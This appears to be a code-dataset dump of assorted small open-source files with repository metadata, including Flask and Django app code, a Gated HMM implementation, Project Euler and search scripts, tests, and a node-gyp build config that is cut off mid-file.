blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
459e8127e4b5cb873a598644dc79c3d2708b3db1
|
a9c0a8d815b6453aca945849f3b402f75684bfcb
|
/project/api/services.py
|
95d316eb964a262ab8aa954303e31d09a23b1d26
|
[] |
no_license
|
harrywang/my-flask-tdd-docker
|
4035b666a3366cd059a3a65c68c7c9ad9b637da3
|
362c33e7caa3bf35a62cff71f3c567c5e8de1fd2
|
refs/heads/master
| 2022-04-13T23:12:04.725775
| 2020-03-21T18:14:00
| 2020-03-21T18:14:00
| 248,801,429
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 679
|
py
|
# project/api/services.py
from project import db
from project.api.models import User
def get_all_users():
return User.query.all()
def get_user_by_id(user_id):
return User.query.filter_by(id=user_id).first()
def get_user_by_email(email):
return User.query.filter_by(email=email).first()
def add_user(username, email):
user = User(username=username, email=email)
db.session.add(user)
db.session.commit()
return user
def update_user(user, username, email):
user.username = username
user.email = email
db.session.commit()
return user
def delete_user(user):
db.session.delete(user)
db.session.commit()
return user
|
[
"harryjwang@gmail.com"
] |
harryjwang@gmail.com
|
55dfdc90e02123686986cc1acf673b300872d8e1
|
b2c3feb259d8cfefe64938aa029958c50387a4ec
|
/distributed/server.py
|
c8312838d2085883135141b19fb7c53a17b91623
|
[] |
no_license
|
alexflint/tensorflow-experiments
|
0a7a5d73571bdf111ce37b4e9711df213e9d354e
|
3a95d0a869ddc9d6309bb8d6f5b06d3347748d0c
|
refs/heads/master
| 2023-07-07T01:43:06.937158
| 2018-08-12T19:17:03
| 2018-08-12T19:17:03
| 140,112,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 106
|
py
|
import tensorflow as tf
server = tf.train.Server.create_local_server()
print(server.target)
server.join()
|
[
"alex.flint@gmail.com"
] |
alex.flint@gmail.com
|
f9a7397aba99d47d53fd78c5c0b097fe73bfd768
|
fbb1550dc5437d672ed0137bd7711eba3290dee3
|
/students/Luyao_Xu/lesson01/activity/calculator/subtracter.py
|
328933552f5932496f2d61a3f2eb8b8bb3a1c036
|
[] |
no_license
|
JavaRod/SP_Python220B_2019
|
2cc379daf5290f366cf92dc317b9cf68e450c1b3
|
5dac60f39e3909ff05b26721d602ed20f14d6be3
|
refs/heads/master
| 2022-12-27T00:14:03.097659
| 2020-09-27T19:31:12
| 2020-09-27T19:31:12
| 272,602,608
| 1
| 0
| null | 2020-06-16T03:41:14
| 2020-06-16T03:41:13
| null |
UTF-8
|
Python
| false
| false
| 110
|
py
|
class Subtracter:
@staticmethod
def calc(operand_1, operand_2):
return operand_1 - operand_2
|
[
"xuluyao19931213@gmail.com"
] |
xuluyao19931213@gmail.com
|
f999bc0811f3d15a0bf554e32cd623a97861a497
|
f9b047b25184787af88fd151f2a6226b6b342954
|
/investmentTornadoServer/server/corpora.py
|
6d0570a7cfa8308f2e0cc773ff1adf8306bb5b7b
|
[] |
no_license
|
CallMeJiaGu/TonrnadoRecomendServer
|
4bfc3dd6d6a432321f80b12d66bb424fbc1a0911
|
54bb21191b16da27c20ce64ab14762bc777e30ca
|
refs/heads/master
| 2020-03-23T19:31:43.291995
| 2019-07-04T03:04:58
| 2019-07-04T03:04:58
| 141,984,920
| 8
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,210
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Wu Yuanchao <151050012@hdu.edu.cn>
import logConfig
import logging
import os
import codecs
logger = logging.getLogger()
class CorporaWithTitle():
def __init__(self, cutedfile):
self.f = cutedfile
def __iter__(self):
with codecs.open(self.f, 'r', 'utf-8') as f:
for line in f:
cols = line.strip().lower().split(' ')
yield cols[0], cols[1:]
class CorporaWithoutTitle():
def __init__(self, cuted_file):
self.f = cuted_file
def __iter__(self):
with codecs.open(self.f, 'r', 'utf-8') as f:
for line in f:
cols = line.strip().lower().split(' ')
yield cols[1:]
class CorporaCut():
def __init__(self, rawfile, cuttor):
self.rawfile = rawfile
self.cuttor = cuttor
def __iter__(self):
with codecs.open(self.rawfile, 'r', 'utf-8') as f:
for i, line in enumerate(f):
cols = line.strip().split(',')
title, content = cols[0].strip().lower(), u' '.join(cols[1:]).lower()
tokens = self.cuttor.fltcut(content)
if len(tokens) > 0:
yield title.encode('utf8'), tokens
else:
logger.warn('line %d skiped' % i)
def process_rawcorpora(rawfile, target, cuttor):
cuted_corpora = CorporaCut(rawfile, cuttor)
with codecs.open(target, 'w', 'utf-8') as f:
for title, tokens in cuted_corpora:
try:
f.write(title + ' ' + u' '.join(tokens) + os.linesep)
except Exception, e:
logger.error((title, tokens, e))
def load_words(dirname):
words = set()
for fname in os.listdir(dirname):
print('load from ' + fname)
for line in codecs.open(os.path.join(dirname, fname), 'r', 'utf-8'):
for w in set(line.strip().split()):
words.add(w)
return words
if __name__ == '__main__':
from mycut import FilterCut
cuttor = FilterCut()
r = './test/raw/paper_error.txt'
t = './test/cut/test.txt'
process_rawcorpora(r, t, cuttor)
|
[
"646696382@qq.com"
] |
646696382@qq.com
|
49d3fe6b4ad2a62850cc09fd55ce4e235e09ecce
|
71d304e88e996e695451be82cfb24029b4b2b9dd
|
/ghmm.py
|
98589df3885a5307a587e450b86b7e4dd1c99f84
|
[] |
no_license
|
negar7918/GHMMs
|
7875ab232e36b05febac74c3261aca811a08d77a
|
ea75d0f3bd82c0e2e046d34debff4fd352637819
|
refs/heads/master
| 2021-07-20T13:34:37.444101
| 2020-06-09T17:53:39
| 2020-06-09T17:53:39
| 177,122,775
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,871
|
py
|
# This is the implementation of the new method in the below paper published at AIME 2019:
# "Gated Hidden Markov Models for Early Prediction of Outcome of Internet-based Cognitive Behavioral Therapy"
# This implementation is intended for sequences up to length 150 and for longer ones, one should use log probabilities.
# This implementation was used for binary states in HMM and EM needs only 10 iterations (this fact is published already)
# In case of having more states, one should implement the convergence criteria properly.
# Value -1 is used to represent a missing observation or data point; here we handle missing values without imputation.
import numpy as np
def forward(params, observations, label=None):
pi, A, O = params
N = len(observations)
S = pi.shape[0]
alpha = np.zeros((N, S))
# base case
if observations[0] != -1:
alpha[0, :] = pi * O[:, observations[0]]
# handling missing
else:
alpha[0, :] = pi
# recursive case
for i in range(1, N):
for s2 in range(S):
for s1 in range(S):
transition = A[s1, s2]
# supervised part
if i == N - 1 and label is not None:
if label == s2:
transition = 1
else:
transition = 0
if observations[i] != -1:
alpha[i, s2] += alpha[i - 1, s1] * transition * O[s2, observations[i]]
# handling missing
else:
alpha[i, s2] += alpha[i - 1, s1] * transition
return alpha, np.sum(alpha[N - 1, :])
def backward(params, observations):
pi, A, O = params
N = len(observations)
S = pi.shape[0]
beta = np.zeros((N, S))
# base case
beta[N - 1, :] = 1
# recursive case
for i in range(N - 2, -1, -1):
for s1 in range(S):
for s2 in range(S):
if observations[i + 1] != -1:
beta[i, s1] += beta[i + 1, s2] * A[s1, s2] * O[s2, observations[i + 1]]
# handling missings
else:
beta[i, s1] += beta[i + 1, s2] * A[s1, s2]
return beta, np.sum(pi * O[:, observations[0]] * beta[0, :])
# this is a modified version of Baum_Welch
# threshold: is intended to compare with the fractional change
# policy: contains the begin and end indexes needed to calculate the fractional change e.g [[0, 9], [-10, -1]]
# label: is the hidden state of the GHMM which needs regulation by gate mechanism
# labels for the training data are expected to be at the end of each sequence in the training data
def ghmm(training, pi, A, O, iterations, threshold, policy, label):
pi, A, O = np.copy(pi), np.copy(A), np.copy(O)
S = pi.shape[0]
begin = policy[0]
end = policy[1]
# do several steps of EM hill climbing
for it in range(iterations):
pi1 = np.zeros_like(pi)
A1 = np.zeros_like(A)
O1 = np.zeros_like(O)
for observations in training:
obs = observations[:-1]
# compute forward-backward matrices
alpha, za = forward((pi, A, O), obs, observations[-1]) # observations[-1] is the label of the sequence
beta, zb = backward((pi, A, O), obs)
# calculate sums at the desired indexes in the sequence for fractional change
sum_begin = np.sum(obs[begin[0]:begin[1]]) + obs[begin[0]:begin[1]].count(-1)
sum_end = np.sum(obs[end[0]:end[1]]) + obs[end[0]:end[1]].count(-1)
fractional_change = (abs(sum_begin - sum_end)) / sum_begin
# M-step here, calculating the frequency of starting state, transitions and (state, obs) pairs
pi1 += alpha[0, :] * beta[0, :] / za
for i in range(0, len(obs)):
# handling missings
if obs[i] != -1:
O1[:, obs[i]] += alpha[i, :] * beta[i, :] / za
for i in range(1, len(obs)):
for s1 in range(S):
for s2 in range(S):
trans = A[s1, s2]
# gate mechanism: affect the update by considering fractional_change
if s2 == label and fractional_change < threshold:
trans = 0
if obs[i] != -1:
A1[s1, s2] += alpha[i - 1, s1] * trans * O[s2, obs[i]] * beta[i, s2] / za
else:
A1[s1, s2] += alpha[i - 1, s1] * trans * beta[i, s2] / za
# normalise pi1, A1, O1
pi = pi1 / np.sum(pi1)
for s in range(S):
A[s, :] = A1[s, :] / np.sum(A1[s, :])
O[s, :] = O1[s, :] / np.sum(O1[s, :])
return pi, A, O
# quick test
a = np.array([[0.6, 0.4], [0.4, 0.6]])
p = np.array([0.7, 0.3])
o = np.array([[0.7, 0.1, 0.2, 0, 0, 0], [0, 0., 0.3, .4, .2, .1]])
label_0, label_1 = 0, 1
# the first two sequences have fractional change higher than threshold and the other two lower
data = [[4, 4, 3, 2, -1, -1, 3, 4, 1, 1, 0, label_0],
[4, 3, 3, -1, 3, -1, 3, -1, 1, 1, 1, label_0],
[5, 5, 5, 3, 4, -1, -1, -1, 4, 5, 4, label_1],
[4, 5, -1, 3, 4, 5, -1, -1, -1, 5, 3, label_1]]
start_prob, transition_prob, emission_prob = ghmm(data, p, a, o, 10,
threshold=.51, policy=[[0, 2], [-2, -1]], label=label_0)
print(start_prob)
print(transition_prob)
print(emission_prob)
print('\n')
# do perdiction for a new sequence without having label
sequence = [5, 4, -1, 4, 4, 5, -1, -1, -1, 5, 4]
fwd, s = forward((start_prob, transition_prob, emission_prob), sequence)
prob = fwd[len(sequence) - 1, 1] / s
print("prediction probability: {}".format(prob))
print("predicted label: {}".format(1 if prob > .5 else 0))
|
[
"negars@kth.se"
] |
negars@kth.se
|
d7ce13d83dd278c415907caea2967729f60ed941
|
78a8c8a60b9ebb6c5e01528253971f8464acdc27
|
/python/problem79.py
|
be165c1f7339f7177c38ab3d2d5c3cc45a096b0d
|
[] |
no_license
|
hakver29/project_euler
|
f1b2d19f0bf2c6b842256f961845424cd2dc696f
|
ab356a32d706759531cad7a1a6586534ff92c142
|
refs/heads/master
| 2021-06-03T13:39:22.758018
| 2020-12-01T23:42:35
| 2020-12-01T23:42:35
| 70,273,535
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 559
|
py
|
import pandas as pd
import os
path = './p079_keylog.txt'
data = pd.read_csv(path, header=None)
print(data)
# First letter: [1,3,6,7]
# Only 7 is always first: 7
# Second letter: [1,2,3,6]
# 3 before 1
# 3 before 6
# 3 before 2
# Second letter: 3
# Third letter: [0, 1,2,6,7,8,9]
# 1 before 9 2 8 6 0
# Third letter: 1
# Fourth letter: [0,2,6,8,9]
# 6 before 0,2,8,9
# Fourth letter: 6
# Fifth letter: [0,2,8,9]
# 8 before 0
# 9 before 0
# 8 before 9
# 2 before 9
# 2 before 8
# Fifth letter: 2
# Sixth letter: [0,8,9]
# Remaining: 890
# Answer: 73162890
|
[
"haakongv@stud.ntnu.no"
] |
haakongv@stud.ntnu.no
|
5edb0c8e55ee71407031f5baea3676bd34bf5368
|
28ae42f6a83fd7c56b2bf51e59250a31e68917ca
|
/tracpro/polls/migrations/0015_issue_region.py
|
ff1c2937af89c2c8ce646673002fd58356fd1f04
|
[
"BSD-3-Clause"
] |
permissive
|
rapidpro/tracpro
|
0c68443d208cb60cbb3b2077977786f7e81ce742
|
a68a782a7ff9bb0ccee85368132d8847c280fea3
|
refs/heads/develop
| 2021-01-19T10:29:48.381533
| 2018-03-13T12:17:11
| 2018-03-13T12:17:11
| 29,589,268
| 5
| 10
|
BSD-3-Clause
| 2018-02-23T14:43:12
| 2015-01-21T12:51:24
|
Python
|
UTF-8
|
Python
| false
| false
| 575
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('groups', '0004_auto_20150123_0909'),
('polls', '0014_remove_response_is_complete'),
]
operations = [
migrations.AddField(
model_name='issue',
name='region',
field=models.ForeignKey(related_name='issues_2', to='groups.Region', help_text='Region where poll was conducted', null=True),
preserve_default=True,
),
]
|
[
"rowanseymour@gmail.com"
] |
rowanseymour@gmail.com
|
adec15e7f10d62c6d1a6c1bca83ce174883b2551
|
69f47a6e77fc2a1363fc8713ed83d36209e7cf32
|
/deframed/default.py
|
997b289bd34920ff3704dc3d241fa7fbc6f6c50e
|
[] |
no_license
|
smurfix/deframed
|
f1c4611c597809b53a138b70665430ed080a989d
|
9c1d4db2991cef55725ac6ecae44af60a96ff4f2
|
refs/heads/master
| 2022-07-20T14:08:35.938667
| 2022-07-14T07:05:43
| 2022-07-14T07:05:43
| 259,882,446
| 24
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,184
|
py
|
"""
This module contains the default values for configuring DeFramed.
"""
from .util import attrdict
__all__ = ["CFG"]
CFG = attrdict(
logging=attrdict( # a magic incantation
version=1,
loggers=attrdict(
#"asyncari": {"level":"INFO"},
),
root=attrdict(
handlers= ["stderr",],
level="INFO",
),
handlers=attrdict(
logfile={
"class":"logging.FileHandler",
"filename":"/var/log/deframed.log",
"level":"INFO",
"formatter":"std",
},
stderr={
"class":"logging.StreamHandler",
"level":"INFO",
"formatter":"std",
"stream":"ext://sys.stderr",
},
),
formatters=attrdict(
std={
"class":"deframed.util.TimeOnlyFormatter",
"format":'%(asctime)s %(levelname)s:%(name)s:%(message)s',
},
),
disable_existing_loggers=False,
),
server=attrdict( # used to setup the hypercorn toy server
host="127.0.0.1",
port=8080,
prio=0,
name="test me",
use_reloader=False,
ca_certs=None,
certfile=None,
keyfile=None,
),
mainpage="templates/layout.mustache",
debug=False,
data=attrdict( # passed to main template
title="Test page. Do not test!",
loc=attrdict(
#msgpack="https://github.com/ygoe/msgpack.js/raw/master/msgpack.min.js",
#mustache="https://github.com/janl/mustache.js/raw/master/mustache.min.js",
msgpack="https://unpkg.com/@msgpack/msgpack",
mustache="/static/ext/mustache.min.js",
bootstrap_css="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css",
bootstrap_js="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js",
poppler="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js",
jquery="https://code.jquery.com/jquery-3.4.1.slim.min.js",
),
static="static", # path
),
)
|
[
"matthias@urlichs.de"
] |
matthias@urlichs.de
|
7d75a5e69d0aeff702d6fe53686e32f47cd01b4e
|
f1614f3531701a29a33d90c31ab9dd6211c60c6b
|
/test/menu_sun_integration/handlers/test_status_synchronizer_service.py
|
207c451856241312424ce76fdbb72a3f98062b7d
|
[] |
no_license
|
pfpacheco/menu-sun-api
|
8a1e11543b65db91d606b2f3098847e3cc5f2092
|
9bf2885f219b8f75d39e26fd61bebcaddcd2528b
|
refs/heads/master
| 2022-12-29T13:59:11.644409
| 2020-10-16T03:41:54
| 2020-10-16T03:41:54
| 304,511,679
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,110
|
py
|
import json
import os
import responses
import pytest
from menu_sun_api.domain.model.customer.customer import Customer
from menu_sun_api.domain.model.order.order import OrderStatusType
from menu_sun_api.domain.model.order.order_repository import OrderRepository
from menu_sun_api.domain.model.seller.seller import IntegrationType
from menu_sun_integration.application.services.order_integration_service import OrderIntegrationService
from promax.application.status_synchronizer_service import StatusSynchronizerService
from test.menu_sun_api.db.order_factory import OrderFactory, OrderStatusFactory
from test.menu_sun_api.db.seller_factory import SellerFactory
from test.menu_sun_api.integration_test import IntegrationTest
here = os.path.dirname(os.path.realpath(__file__))
def bind_seller(integration_type):
return SellerFactory.create(seller_code='0810204', integration_type=integration_type)
class TestStatusNotifierService(IntegrationTest):
@pytest.fixture
def active_responses(self):
json_file = open(
os.path.join(
here,
'../../menu_sun_integration/infrastructure/ambev/promax_response/authenticate_user_response.json'))
response = json.load(json_file)
responses.add(responses.POST, 'https://{}/ambev/security/ldap/authenticateUser'.format(os.getenv("PROMAX_IP")),
json=response, status=200)
return responses
@responses.activate
def test_fetch_order_status_promax(self, session, active_responses):
seller = bind_seller(IntegrationType.PROMAX)
session.commit()
customer = Customer(document="17252508000180", seller_id=seller.id)
statuses = [OrderStatusFactory(status=OrderStatusType.NEW),
OrderStatusFactory(status=OrderStatusType.APPROVED)]
order = OrderFactory.create(seller_id=seller.id, order_id='M2100008658',
customer=customer, statuses=statuses)
session.commit()
json_file = open(
os.path.join(
here,
'../../menu_sun_integration/infrastructure/ambev/promax_response/orders_history_response.json'))
response = json.load(json_file)
active_responses.add(responses.POST,
'https://{}/ambev/genericRestEndpoint'.format(os.getenv("PROMAX_IP")),
json=response, status=200)
order_repository = OrderRepository(session=session)
integration_service = OrderIntegrationService(session=session)
status_notification = StatusSynchronizerService(order_repository=order_repository,
integration_service=integration_service)
status_notification.sync_all_pending_orders(
seller_id=seller.id, seller_code=seller.seller_code, integration_type=seller.integration_type)
session.commit()
order = order_repository.get_order(
seller_id=seller.id, order_id=order.order_id)
assert (order.status.status == OrderStatusType.CANCELED)
|
[
"pfpacheco@gmail.com"
] |
pfpacheco@gmail.com
|
dedc1e2d4474ac95a338056cb6ee689645ed4e0c
|
3607629e732c37f40231fe4c83e73ac087ed3fcf
|
/poc-todo/POC/APP/Task/migrations/0004_remove_usertasks_first_name.py
|
08ca53373c7ef5acfe15379664dd64b1b080bddd
|
[] |
no_license
|
gout-tech/apis_cusat_connect
|
3d71f73a620b7fa489671f45cbce7cc7b6972f80
|
fd7114480592e81ead6e2efe932504629c2ff696
|
refs/heads/master
| 2022-05-29T14:10:10.326086
| 2020-02-25T04:18:38
| 2020-02-25T04:18:38
| 242,907,961
| 0
| 0
| null | 2022-04-22T23:06:17
| 2020-02-25T04:17:32
|
Python
|
UTF-8
|
Python
| false
| false
| 334
|
py
|
# Generated by Django 2.2.1 on 2019-08-12 13:16
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Task', '0003_usertasks_first_name'),
]
operations = [
migrations.RemoveField(
model_name='usertasks',
name='first_name',
),
]
|
[
"goutham.hashrot@gmail.com"
] |
goutham.hashrot@gmail.com
|
6d5e991fc2b55c73e9b32da5c9d0db6a146186b2
|
a22054032f23d84f34741532aaca5fe46e23a552
|
/run_app_dev.py
|
6fae0d484a2796685d1401726f30707b1548e9fc
|
[] |
no_license
|
BearChao/transfer
|
622003bfb0b2b7c8da6287a65764c69ad81f3d9c
|
4159a596d0f5c728f6ce27568beb21c2ba321846
|
refs/heads/master
| 2021-05-23T06:08:01.183541
| 2018-05-28T14:39:30
| 2018-05-28T14:39:30
| 94,799,123
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from app import create_app
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
if __name__ == '__main__':
app.run(host='0.0.0.0',debug=True)
|
[
"zynick@foxmail.com"
] |
zynick@foxmail.com
|
811d4c6beed89125664d5495f5675efc4f51e2f2
|
3d18dbe77b052754e2a7a9bbaee9650a9fb410e2
|
/test/11-ignore-design-docs.py
|
ea7165e3f5b58d5a27a8d4f9da83c47858fcd920
|
[
"Apache-2.0"
] |
permissive
|
apache/couchdb-mango
|
765ebceec2912acb9696fadf9ec8f3d244d604c6
|
312e2c45535913c190cdef51f6ea65066ccd89dc
|
refs/heads/master
| 2023-07-02T18:36:31.552696
| 2017-02-07T16:40:09
| 2017-03-31T17:25:17
| 30,287,956
| 39
| 23
|
Apache-2.0
| 2023-01-18T14:24:00
| 2015-02-04T08:00:05
|
Erlang
|
UTF-8
|
Python
| false
| false
| 1,106
|
py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import mango
import unittest
DOCS = [
{
"_id": "_design/my-design-doc",
},
{
"_id": "54af50626de419f5109c962f",
"user_id": 0,
"age": 10,
"name": "Jimi"
},
{
"_id": "54af50622071121b25402dc3",
"user_id": 1,
"age": 11,
"name": "Eddie"
}
]
class IgnoreDesignDocsForAllDocsIndexTests(mango.DbPerClass):
def test_should_not_return_design_docs(self):
self.db.save_docs(DOCS)
docs = self.db.find({"_id": {"$gte": None}})
assert len(docs) == 2
|
[
"garren.smith@gmail.com"
] |
garren.smith@gmail.com
|
9152ac03f49d6c145510fb642b234cac13c0b135
|
23e0f2433ae89295766a24d8d87626d18af6e84c
|
/problems/abc179_a.py
|
78c1867f75ae21403e67d3de6f63c06edac7d487
|
[] |
no_license
|
chokoryu/atcoder
|
0d7ec486177e45abee847acde38d31d35c61df42
|
e0c0920a7a4d8a90fd6fb3cab7ab1e97a95b9084
|
refs/heads/master
| 2023-02-06T12:06:09.562394
| 2020-12-29T02:42:54
| 2020-12-29T02:42:54
| 283,260,970
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 460
|
py
|
from fractions import gcd
from collections import Counter, deque, defaultdict
from heapq import heappush, heappop, heappushpop, heapify, heapreplace, merge
from bisect import bisect_left, bisect_right, bisect, insort_left, insort_right, insort
from itertools import accumulate, product, permutations, combinations
def main():
S = input()
if S[-1] == 's':
print(S + 'es')
else:
print(S + 's')
if __name__ == '__main__':
main()
|
[
"chokoryu@gmail.com"
] |
chokoryu@gmail.com
|
6b10d9a5295db113b96722c8b92c968c83079333
|
ef821468b081ef2a0b81bf08596a2c81e1c1ef1a
|
/Python OOP/Decorators-Exercise/Cache.py
|
3630fbd6868ddb28d50316c5fea622d51b440ae5
|
[] |
no_license
|
Ivaylo-Atanasov93/The-Learning-Process
|
71db22cd79f6d961b9852f140f4285ef7820dd80
|
354844e2c686335345f6a54b3af86b78541ed3f3
|
refs/heads/master
| 2023-03-30T20:59:34.304207
| 2021-03-29T15:23:05
| 2021-03-29T15:23:05
| 294,181,544
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
def cache(func):
def wrapper(n):
result = func(n)
wrapper.log[n] = result
return result
wrapper.log = {}
return wrapper
@cache
def fibonacci(n):
if n < 2:
return n
else:
return fibonacci(n - 1) + fibonacci(n - 2)
fibonacci(3)
print(fibonacci.log)
fibonacci(4)
print(fibonacci.log)
|
[
"ivailo.atanasov93@gmail.com"
] |
ivailo.atanasov93@gmail.com
|
e6f8f51a840280d413cfe95488d13ed729fe6b2e
|
3c2bb35d04a2dd44e16366c6e52eb74ecf8ba87b
|
/linearsearch.py
|
27f9b69282c90729ee8439a664c1be6609b2dad0
|
[] |
no_license
|
Brijesh-Pandey/Python-Programs-For-Noobs
|
7c871ebf01ce5f9e4cfa53b100b8f1b569f72a5d
|
1d7187986a26d3f7ebcf3699017ab242dd16b482
|
refs/heads/main
| 2023-08-18T01:46:22.533629
| 2021-10-09T20:06:30
| 2021-10-21T01:37:49
| 301,089,699
| 6
| 11
| null | 2021-05-18T09:27:14
| 2020-10-04T09:32:23
|
Python
|
UTF-8
|
Python
| false
| false
| 247
|
py
|
z=int(input("Enter element to be searched "))
li=[int(x) for x in input().split()]
for i in range(len(li)):
if li[i]==z:
flag=1
break
else:
flag=0
if flag==1:
print("Found at position ",+i+1 )
else:
print("Not found")
input()
|
[
"noreply@github.com"
] |
Brijesh-Pandey.noreply@github.com
|
f37490ad07011a1845fa6775b2a3edffd1ff59fc
|
5141c8756e790847866c19d63744bd7c8033a51c
|
/docs/libs/reveal.js/3.7.0/plugin/multiplex/node_modules/bufferutil/build/config.gypi
|
508a69af90f898303ce883dba2be1aa581eebd58
|
[
"MIT"
] |
permissive
|
al341801/EI1036_42
|
db6fceb4fdb9272b28f34c16ee520ce072c5810b
|
d1d2c1b86a134fc4c45ba4146002589f7bee27f3
|
refs/heads/master
| 2020-09-15T13:02:09.056697
| 2019-11-22T15:05:53
| 2019-11-22T15:05:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,286
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"coverage": "false",
"debug_devtools": "node",
"debug_http2": "false",
"debug_nghttp2": "false",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_file": "icudt60l.dat",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt60l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "60",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 59,
"node_no_browser_globals": "false",
"node_prefix": "/",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_nghttp2": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "59.dylib",
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/dllido/.node-gyp/9.3.0",
"standalone_static_library": 1,
"dry_run": "",
"legacy_bundling": "",
"save_dev": "",
"browser": "",
"commit_hooks": "true",
"only": "",
"viewer": "man",
"also": "",
"rollback": "true",
"sign_git_commit": "",
"audit": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/bash",
"metrics_registry": "https://registry.npmjs.org/",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"timing": "",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"preid": "",
"fetch_retries": "2",
"noproxy": "",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"logs_max": "10",
"prefer_online": "",
"cache_lock_retries": "10",
"global_style": "",
"update_notifier": "true",
"audit_level": "low",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"offline": "",
"read_only": "",
"searchlimit": "20",
"access": "",
"json": "",
"allow_same_version": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/dllido/.npm-init.js",
"userconfig": "/Users/dllido/.npmrc",
"cidr": "",
"node_version": "9.3.0",
"user": "",
"auth_type": "legacy",
"editor": "vi",
"ignore_prepublish": "",
"save": "true",
"script_shell": "",
"tag": "latest",
"global": "",
"progress": "true",
"ham_it_up": "",
"optional": "true",
"searchstaleness": "900",
"bin_links": "true",
"force": "",
"save_prod": "",
"searchopts": "",
"depth": "Infinity",
"node_gyp": "/usr/local/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js",
"rebuild_bundle": "true",
"sso_poll_frequency": "500",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"scripts_prepend_node_path": "warn-only",
"sso_type": "oauth",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"prefer_offline": "",
"version": "",
"cache_min": "10",
"otp": "",
"cache": "/Users/dllido/.npm",
"searchexclude": "",
"color": "true",
"package_lock": "true",
"package_lock_only": "",
"save_optional": "",
"user_agent": "npm/6.7.0 node/v9.3.0 darwin x64",
